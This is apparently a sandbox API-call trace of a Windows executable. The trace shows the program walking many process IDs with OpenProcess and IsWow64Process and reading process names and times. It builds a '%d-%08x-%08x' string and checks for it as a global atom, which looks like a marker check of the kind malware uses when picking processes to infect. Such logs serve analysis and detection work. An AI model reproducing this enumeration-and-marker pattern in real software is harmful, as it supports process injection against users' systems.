	[0088.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0088.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.150] CloseHandle (hObject=0x20c) returned 1
	[0088.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0088.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.150] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.151] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.151] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.151] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.152] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetLastError () returned 0x5
	[0088.153] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.153] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.154] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.154] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.154] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.154] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.154] CloseHandle (hObject=0x20c) returned 1
	[0088.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.154] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.154] CloseHandle (hObject=0x20c) returned 1
	[0088.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.209] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.209] CloseHandle (hObject=0x20c) returned 1
	[0088.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.210] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.210] CloseHandle (hObject=0x20c) returned 1
	[0088.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.210] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.210] CloseHandle (hObject=0x20c) returned 1
	[0088.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.210] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.210] CloseHandle (hObject=0x20c) returned 1
	[0088.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.210] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.210] CloseHandle (hObject=0x20c) returned 1
	[0088.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.210] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.210] CloseHandle (hObject=0x20c) returned 1
	[0088.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.211] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.211] CloseHandle (hObject=0x20c) returned 1
	[0088.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.211] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.211] CloseHandle (hObject=0x20c) returned 1
	[0088.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.211] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.211] CloseHandle (hObject=0x20c) returned 1
	[0088.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.211] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.211] CloseHandle (hObject=0x20c) returned 1
	[0088.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.212] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.212] CloseHandle (hObject=0x20c) returned 1
	[0088.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.212] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.212] CloseHandle (hObject=0x20c) returned 1
	[0088.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.212] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.212] CloseHandle (hObject=0x20c) returned 1
	[0088.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.212] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.212] CloseHandle (hObject=0x20c) returned 1
	[0088.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.212] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.212] CloseHandle (hObject=0x20c) returned 1
	[0088.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.212] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.212] CloseHandle (hObject=0x20c) returned 1
	[0088.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.213] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.213] CloseHandle (hObject=0x20c) returned 1
	[0088.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.213] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.213] CloseHandle (hObject=0x20c) returned 1
	[0088.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.213] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.213] CloseHandle (hObject=0x20c) returned 1
	[0088.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.213] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.213] CloseHandle (hObject=0x20c) returned 1
	[0088.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.213] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.213] CloseHandle (hObject=0x20c) returned 1
	[0088.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.214] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.214] CloseHandle (hObject=0x20c) returned 1
	[0088.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.214] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.214] CloseHandle (hObject=0x20c) returned 1
	[0088.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.214] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.214] CloseHandle (hObject=0x20c) returned 1
	[0088.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.214] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.214] CloseHandle (hObject=0x20c) returned 1
	[0088.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.214] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.214] CloseHandle (hObject=0x20c) returned 1
	[0088.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.214] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.215] CloseHandle (hObject=0x20c) returned 1
	[0088.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.215] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.215] CloseHandle (hObject=0x20c) returned 1
	[0088.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.215] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.215] CloseHandle (hObject=0x20c) returned 1
	[0088.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.215] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.215] CloseHandle (hObject=0x20c) returned 1
	[0088.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.215] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.215] CloseHandle (hObject=0x20c) returned 1
	[0088.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.216] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.216] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.216] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.216] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.216] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.216] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.216] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.216] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.217] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.217] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.217] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.217] CloseHandle (hObject=0x20c) returned 1
	[0088.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.217] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.217] CloseHandle (hObject=0x20c) returned 1
	[0088.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.343] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.343] CloseHandle (hObject=0x20c) returned 1
	[0088.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.343] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.343] CloseHandle (hObject=0x20c) returned 1
	[0088.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.343] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.343] CloseHandle (hObject=0x20c) returned 1
	[0088.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.344] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.344] CloseHandle (hObject=0x20c) returned 1
	[0088.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.344] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.344] CloseHandle (hObject=0x20c) returned 1
	[0088.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.344] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.344] CloseHandle (hObject=0x20c) returned 1
	[0088.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.344] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.344] CloseHandle (hObject=0x20c) returned 1
	[0088.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.344] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.344] CloseHandle (hObject=0x20c) returned 1
	[0088.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.345] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.345] CloseHandle (hObject=0x20c) returned 1
	[0088.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.345] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.345] CloseHandle (hObject=0x20c) returned 1
	[0088.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.345] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.345] CloseHandle (hObject=0x20c) returned 1
	[0088.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.346] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.346] CloseHandle (hObject=0x20c) returned 1
	[0088.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
